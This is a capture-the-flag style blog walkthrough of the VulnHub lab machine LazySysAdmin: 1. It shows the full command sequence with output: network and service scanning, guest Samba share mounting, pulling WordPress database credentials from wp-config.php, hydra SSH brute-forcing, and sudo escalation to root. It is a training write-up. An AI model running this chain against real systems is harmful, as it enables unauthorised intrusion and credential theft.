Overview

Penetration Test Training – LazySysAdmin: 1 (vanilla style)

No Comments

and

Today we’re going to start out training session with a fairly decent image from vulnhub.comLazySysAdmin: 1.
To use this image, just download, unzip and throw it against a running virtualbox.

Just be sure to create a host-only network beforehand, so we can find the virtual machine. The system itself will get an IP Adress via DHCP on this network. We’re using vboxnet4 (192.168.60.0/24) here, so just adapt this to your networking.
We are also working on a macOS 10.3, so be sure to adapt the used tools to your environment. We used the following tools:

If you want to install these tools with Homebrew, just tap brew tap feffi/homebrew-pentest.

$ brew tap feffi/homebrew-pentest

Everything up? OK, let’s start.

Meanwhile somewhere in outer space…

$ sudo netdiscover -i vboxnet4 -f -r 192.168.60.0/24
 Currently scanning: Finished!   |   Our Mac is: DE:AD:BE:EF:DE:AD - 0

 1 Captured ARP Req/Rep packets, from 1 hosts.   Total size: 1
 _________________________________________________________________
   IP            At MAC Address      Count  Len   MAC Vendor
 -----------------------------------------------------------------
 192.168.60.2    08:00:27:6d:95:4e   1      60    Unknown vendor

Ah, right, 192.168.60.2, that’s fine. For the sake of reusing this IP in our tasks, we just shorten it a bit:

$ export ip="192.168.60.2"
$ echo $ip

Nice, let’s start a common scanning for services:

$ nmap -sV -sC $ip
Starting Nmap 7.60 ( https://nmap.org ) at 2017-11-04 14:20 CET
Nmap scan report for 192.168.60.2
Host is up (1.0s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 b5:38:66:0f:a1:ee:cd:41:69:3b:82:cf:ad:a1:f7:13 (DSA)
|   2048 58:5a:63:69:d0:da:dd:51:cc:c1:6e:00:fd:7e:61:d0 (RSA)
|   256 61:30:f3:55:1a:0d:de:c8:6a:59:5b:c9:9c:b4:92:04 (ECDSA)
|_  256 1f:65:c0:dd:15:e6:e4:21:f2:c1:9b:a3:b6:55:a0:45 (EdDSA)
80/tcp   open  http        Apache httpd 2.4.7 ((Ubuntu))
|_http-generator: Silex v2.2.7
| http-robots.txt: 4 disallowed entries
|_/old/ /test/ /TR2/ /Backnode_files/
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Backnode
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
3306/tcp open  mysql       MySQL (unauthorized)
6667/tcp open  irc         InspIRCd
| irc-info:
|   server: Admin.local
|   users: 1
|   servers: 1
|   chans: 0
|   lusers: 1
|   lservers: 0
|   source ident: nmap
|   source host: 192.168.60.1
|_  error: Closing link: (nmap@192.168.60.1) [Client exited]
Service Info: Hosts: LAZYSYSADMIN, Admin.local; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 59m57s, deviation: 0s, median: 59m57s
|_nbstat: NetBIOS name: LAZYSYSADMIN, NetBIOS user: , NetBIOS MAC:  (unknown)
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: lazysysadmin
|   NetBIOS computer name: LAZYSYSADMIN\x00
|   Domain name: \x00
|   FQDN: lazysysadmin
|_  System time: 2017-11-05T00:22:19+10:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2017-11-04 15:22:19
|_  start_date: 1601-01-01 00:53:28

Ok, that’s a lot of surface to cover. Let’s start with the laziest type of service: Samba. As we can see, the account guest is authenticated as user, that is nice. Before we continue, we note down everything that might be a username or password:

$ echo "TR2" >> login.txt
$ echo "guest" >> login.txt
$ echo "LAZYSYSADMIN" >> login.txt
$ echo "lazysysadmin" >> login.txt
$ echo "x00" >> login.txt

Let’s chat…

Having a look a the irc deamon …

$ telnet 192.168.60.2 6667

Escape character is '^]'
:Admin.local NOTICE Auth :*** Looking up your hostname... 

>>PASS none

:Admin.local NOTICE Auth :*** Could not resolve your hostname: Request timed out; using your IP address (192.168.56.1) instead.

>>NICK Bla
>>USER blah blah blah blah

:Admin.local NOTICE Auth :Welcome to Localnet!
:Admin.local 001 Bla :Welcome to the Localnet IRC Network Bla!blah@192.168.56.1
:Admin.local 002 Bla :Your host is Admin.local, running version InspIRCd-2.0
:Admin.local 003 Bla :This server was created 14:52:33 Mar 29 2016
:Admin.local 004 Bla Admin.local InspIRCd-2.0 iosw biklmnopstv bklov
:Admin.local 005 Bla AWAYLEN=201 CASEMAPPING=rfc1459 CHANMODES=b,k,l,imnpst CHANTYPES=# CHARSET=ascii ELIST=MU FNC KICKLEN=256 MAP MAXBANS=60 MAXCHANNELS=20 MAXPARA=32 MAXTARGETS=20 :are supported by this server
:Admin.local 005 Bla MODES=20 NETWORK=Localnet NICKLEN=33 PREFIX=(ov)@+ STATUSMSG=@+ TOPICLEN=308 VBANLIST WALLCHOPS WALLVOICES :are supported by this server
:Admin.local 042 Bla 690AAAAAD :your unique I
:Admin.local 375 Bla :Admin.local message of the day
:Admin.local 372 Bla :- Please edit /etc/inspircd/mot
:Admin.local 376 Bla :End of message of the day.
:Admin.local 251 Bla :There are 1 users and 0 invisible on 1 servers
:Admin.local 254 Bla 0 :channels formed
:Admin.local 255 Bla :I have 1 clients and 0 servers
:Admin.local 265 Bla :Current Local Users: 1  Max: 1
:Admin.local 266 Bla :Current Global Users: 1  Max: 1

Checking for weaknesses on InspIRCd-2.0 … only DoS and spoofing, no remote access known. Let’s walk on to the next.

Samba, Samba, olê…

Now we can enumerate the Samba shares as guest:

$ nmap -sV --script=smb-enum-shares -p445 $ip
Starting Nmap 7.60 ( https://nmap.org ) at 2017-11-04 14:25 CET
Nmap scan report for 192.168.60.2
Host is up (0.00054s latency).

PORT    STATE SERVICE     VERSION
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
Service Info: Host: LAZYSYSADMIN

Host script results:
| smb-enum-shares:
|   account_used: guest
|   \\192.168.60.2\IPC$:
|     Type: STYPE_IPC_HIDDEN
|     Comment: IPC Service (Web server)
|     Users: 1
|     Max Users: 
|     Path: C:\tmp
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\192.168.60.2\print$:
|     Type: STYPE_DISKTREE
|     Comment: Printer Drivers
|     Users: 0
|     Max Users: 
|     Path: C:\var\lib\samba\printers
|     Anonymous access: 
|     Current user access: 
|   \\192.168.60.2\share$:
|     Type: STYPE_DISKTREE
|     Comment: Sumshare
|     Users: 0
|     Max Users: 
|     Path: C:\var\www\html\
|     Anonymous access: READ/WRITE
|_    Current user access: READ/WRITE

Oh, nice! A guest writeable directory. Maybe we can snoop around…

$ mkdir share
$ mount_smbfs //guest:@192.168.60.2/share$ share
$ cd share
$ tree -L 2 .
.
├── Backnode_files
│   ├── AAEAAQAAAAAAAAdJAAAAJDhiNGY1YTk3LTQ3NTctNDE1Ny1hZmU4LTlhMWE4.jpg
│   ├── failure-good-thing-fixed.png
│   ├── front-end.css
│   ├── front-end.js
│   ├── jquery-ui.js
│   ├── jquery.js
│   ├── logo.png
│   ├── normalize.css
│   ├── pageable.js
│   ├── picto1.png
│   ├── picto2.png
│   ├── picto3.png
│   ├── script.json
│   ├── styles.css
│   └── tumblr_lb4pi2yt1C1qb2xivo1_500.gif
├── apache
├── deets.txt
├── index.html
├── info.php
├── old
├── robots.txt
├── test
├── todolist.txt
├── wordpress
│   ├── index.php
│   ├── license.txt
│   ├── readme.html
│   ├── wp-activate.php
│   ├── wp-admin
│   ├── wp-blog-header.php
│   ├── wp-comments-post.php
│   ├── wp-config-sample.php
│   ├── wp-config.php
│   ├── wp-content
│   ├── wp-cron.php
│   ├── wp-includes
│   ├── wp-links-opml.php
│   ├── wp-load.php
│   ├── wp-login.php
│   ├── wp-mail.php
│   ├── wp-settings.php
│   ├── wp-signup.php
│   ├── wp-trackback.php
│   └── xmlrpc.php
└── wp

Really? A wordpress installation! Let us check this first.

$ cat wordpress/wp-config.php | grep DB_USER
define('DB_USER', 'Admin');
$ cat wordpress/wp-config.php | grep DB_PASSWORD
define('DB_PASSWORD', 'TogieMYSQL12345^^');
$ cat wordpress/wp-config.php | grep DB_NAME
define('DB_NAME', 'wordpress');

Noted! We got our first username/password combination.

$ echo "deets" >> login.txt
$ echo "Admin" >> login.txt
$ echo "admin" >> login.txt
$ echo "TogieMYSQL12345^^" >> login.txt
$ echo "Togie" >> login.txt
$ echo "togie" >> login.txt

What else do we get here?

$ cat deets.txt
CBF Remembering all these passwords.

Remember to remove this file and update your password after we push out the server.

Password 12345
$ echo "CBF" >> login.txt
$ echo "12345" >> login.txt

Yeah…sure…we updated it.

$ cat todolist.txt
Prevent users from being able to view to web root using the local file browser

Done. So we got some stuff here, but where to put it?

Land of the Apache

Maybe we should enumerate a little further. We got an website listening on port 80. Spider that:

$ dirb http://$ip
-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Sat Nov  4 14:38:59 2017
URL_BASE: http://192.168.60.2/
WORDLIST_FILES: /usr/local/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.60.2/ ----
==> DIRECTORY: http://192.168.60.2/apache/
+ http://192.168.60.2/index.html (CODE:200|SIZE:36072)
+ http://192.168.60.2/info.php (CODE:200|SIZE:77236)
==> DIRECTORY: http://192.168.60.2/javascript/
==> DIRECTORY: http://192.168.60.2/old/
==> DIRECTORY: http://192.168.60.2/phpmyadmin/
+ http://192.168.60.2/robots.txt (CODE:200|SIZE:92)
+ http://192.168.60.2/server-status (CODE:403|SIZE:292)
==> DIRECTORY: http://192.168.60.2/test/
==> DIRECTORY: http://192.168.60.2/wordpress/
==> DIRECTORY: http://192.168.60.2/wp/
... (lots of output)

Ok, by the time dirb is running we got some interesting directories to look at:

  • http://192.168.60.2/apache/
  • http://192.168.60.2/info.php
  • http://192.168.60.2/phpmyadmin/
  • http://192.168.60.2/wordpress/

And some more. We’ve already seen those in the samba-enumeration. Let’s try our wordpress then…

$ curl -v http://192.168.60.2/wordpress/
...
 
My name is togie.
My name is togie.
My name is togie.
My name is togie.
...

mhhh that togie again…mhhh, maybe…we can try ssh…

Serpentine water monster

Let us try our already filled login list

$ hydra -t 4 -L login.txt -P login.txt ssh://$ip
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2017-11-04 20:35:23
[DATA] max 4 tasks per 1 server, overall 4 tasks, 169 login tries (l:13/p:13), ~43 tries per task
[DATA] attacking ssh://192.168.60.2:22/
[STATUS] 128.00 tries/min, 128 tries in 00:01h, 41 to do in 00:01h, 4 active

[22][ssh] host: 192.168.60.2   login: togie   password: 12345

1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2017-11-04 20:36:42

Nice! So we login using togie and password 12345

$ ssh togie@$ip
##################################################################################################
#                                          Welcome to Web_TR1                                    #
#                             All connections are monitored and recorded                         #
#                    Disconnect IMMEDIATELY if you are not an authorized user!                   #
##################################################################################################

togie@192.168.60.2's password: 12345
Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-31-generic i686)

 * Documentation:  https://help.ubuntu.com/

  System information as of Sun Nov  5 02:24:33 AEST 2017

  System load:  0.0               Processes:           177
  Usage of /:   48.5% of 2.89GB   Users logged in:     0
  Memory usage: 31%               IP address for eth0: 192.168.60.2
  Swap usage:   0%

  Graph this data and manage this system at:
    https://landscape.canonical.com/

133 packages can be updated.
0 updates are security updates.

togie@LazySysAdmin:~$

So we got a shell. Let’s enumerate further.

togie@LazySysAdmin:~$ id
uid=1000(togie) gid=1000(togie) groups=1000(togie),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lpadmin),111(sambashare)

We got sudo…

Flag

$ sudo su -
[sudo] password for togie: 12345
root@LazySysAdmin:~# ls -al
total 28
drwx------  3 root root 4096 Aug 15 23:10 ./
drwxr-xr-x 22 root root 4096 Aug 21 20:10 ../
-rw-------  1 root root 1050 Nov  3 14:45 .bash_history
-rw-r--r--  1 root root 3106 Feb 20  2014 .bashrc
drwx------  2 root root 4096 Aug 14 20:30 .cache/
-rw-r--r--  1 root root  140 Feb 20  2014 .profile
-rw-r--r--  1 root root  347 Aug 21 19:35 proof.txt

Gotcha!

$ cat proof.txt
WX6k7NJtA8gfk*w5J3&T@*Ga6!0o5UP89hMVEQ#PT9851


Well done :)

Hope you learned a few things along the way.

Regards,

Togie Mcdogie




Enjoy some random strings

WX6k7NJtA8gfk*w5J3&T@*Ga6!0o5UP89hMVEQ#PT9851
2d2v#X6x9%D6!DDf4xC1ds6YdOEjug3otDmc1$#slTET7
pf%&1nRpaj^68ZeV2St9GkdoDkj48Fl$MI97Zt2nebt02
bhO!5Je65B6Z0bhZhQ3W64wL65wonnQ$@yw%Zhy0U19pu

 

Kevin Wennemuth

I’m on the hunt for disruptive technologies. Architect, security specialist, DevSecOps, think tank, leading-edge IT concepts. ’nuff said.

Martin Riedel

Martin is a passionate developer with focus on the jvm-ecosystem.
Besides that, he’s an avid linux user, python adept and infosec enthusiast.

Share on FacebookGoogle+Share on LinkedInTweet about this on TwitterShare on RedditDigg thisShare on StumbleUpon

More content about Hacking

Comment

Your email address will not be published. Required fields are marked *